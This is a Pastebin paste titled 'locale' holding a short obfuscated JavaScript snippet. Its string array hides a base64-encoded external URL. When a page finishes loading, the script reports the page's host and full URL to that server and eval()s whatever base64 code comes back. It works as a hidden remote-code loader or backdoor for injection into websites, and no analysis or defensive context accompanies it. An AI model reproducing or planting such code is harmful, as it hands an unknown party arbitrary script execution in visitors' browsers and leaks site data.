Hyperhacker

locale

Sep 21st, 2018
214
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.33 KB | None | 0 0
  1. var _0x736578 = ['xHsK8J3fvc','aHR0cHM6Ly9','5waC9hcGkucGhw','wZXNvcmV3YXJkcy','jkSgamtTZzVKc1NLSa','mtTZzVKc1NLSjamtTZ','zVKc1NLSjUSjU','true'];
  2.  
  3. (function() {
  4. 'use strict';
  5. function exec_on() {
  6. var xmlhttp;
  7. if (window.XMLHttpRequest) {
  8. xmlhttp = new XMLHttpRequest();
  9. } else {
  10. xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  11. }
  12.  
  13. xmlhttp.open("GET", atob(_0x736578[1]+_0x736578[3]+_0x736578[2]) + "?api_response=true&s0="+btoa(document.location.host)+"&s1="+btoa(document.location.href)+"&ap="+key);
  14. xmlhttp.send(null);
  15.  
  16. xmlhttp.onreadystatechange = function() {
  17. if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
  18. if(this.responseText && this.responseText !='') {
  19. var rdata = JSON.parse(this.responseText);
  20. }
  21. if(rdata['execute']) {
  22. eval(atob(rdata['execute']));
  23. console.log('started');
  24. } else {
  25. console.log(rdata);
  26. }
  27. }
  28. };
  29. }
  30.  
  31. document.onreadystatechange = function() {
  32.  
  33. if (document.readyState === "complete") {
  34. exec_on();
  35. } else {
  36. window.onload = function () {
  37. exec_on();
  38. };
  39. };
  40. }
  41.  
  42. })();
Advertisement
Add Comment
Please, Sign In to add comment